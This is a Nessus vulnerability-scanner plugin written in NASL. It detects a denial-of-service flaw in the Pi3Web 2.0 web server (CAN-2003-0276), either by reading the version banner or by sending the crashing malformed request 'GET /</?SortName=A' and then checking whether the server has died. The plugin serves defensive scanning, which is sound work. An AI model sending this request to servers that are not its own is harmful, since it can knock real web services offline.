home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / pi3web_dos2.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  76 lines

  1. #
  2. # (C) Tenable Network Security
  3. #
  4.  
  5. if(description)
  6. {
  7.  script_id(11695);
  8.  script_cve_id("CAN-2003-0276");
  9.  
  10.  script_version ("$Revision: 1.3 $");
  11.  
  12.  name["english"] = "Pi3Web Webserver v2.0 Denial of Service";
  13.  
  14.  script_name(english:name["english"]);
  15.  
  16.  desc["english"] = "
  17. The remote Pi3Web web server may crash when it is sent 
  18. a malformed request, like :
  19.  
  20.     GET /</?SortName=A
  21.     
  22.     
  23. Solution : Upgrade to Pi3Web 2.0.2 beta 2 or newer
  24. Risk factor : High";
  25.  
  26.  script_description(english:desc["english"]);
  27.  
  28.  # Summary
  29.  summary["english"] = "Tests for a DoS in Pi3Web";
  30.  script_summary(english:summary["english"]);
  31.  
  32.  # Category
  33.  script_category(ACT_MIXED_ATTACK);
  34.  
  35.  # Dependencie(s)
  36.  script_dependencie("find_service.nes", "http_version.nasl");
  37.  
  38.  # Family
  39.  family["english"] = "Denial of Service";
  40.  family["francais"] = "DΘni de service";
  41.  script_family(english:family["english"],
  42.                francais:family["francais"]);
  43.  
  44.  # Copyright
  45.  script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  46.  
  47.  script_require_ports("Services/www", 80);
  48.  exit(0);
  49. }
  50.  
  51.  
  52. include ("http_func.inc");
  53. include("http_keepalive.inc");
  54.  
  55. port = get_http_port(default:80);
  56.  
  57.  
  58.  
  59. if(safe_checks())
  60. {
  61.     banner = get_http_banner(port:port);
  62.     if(banner)
  63.     {
  64.      if(egrep(pattern:"^Server: Pi3Web/2\.0\.([01]|2 *beta *[01])", string:banner))
  65.                security_hole(port);
  66.     }
  67. }
  68. else
  69. {
  70.     if(http_is_dead(port:port))exit(0);
  71.      req = http_get(item:"/</?SortName=A", port:port);
  72.     res = http_keepalive_send_recv(port:port, data:req);
  73.     if(http_is_dead(port:port))security_hole(port);
  74. }
  75.  
  76.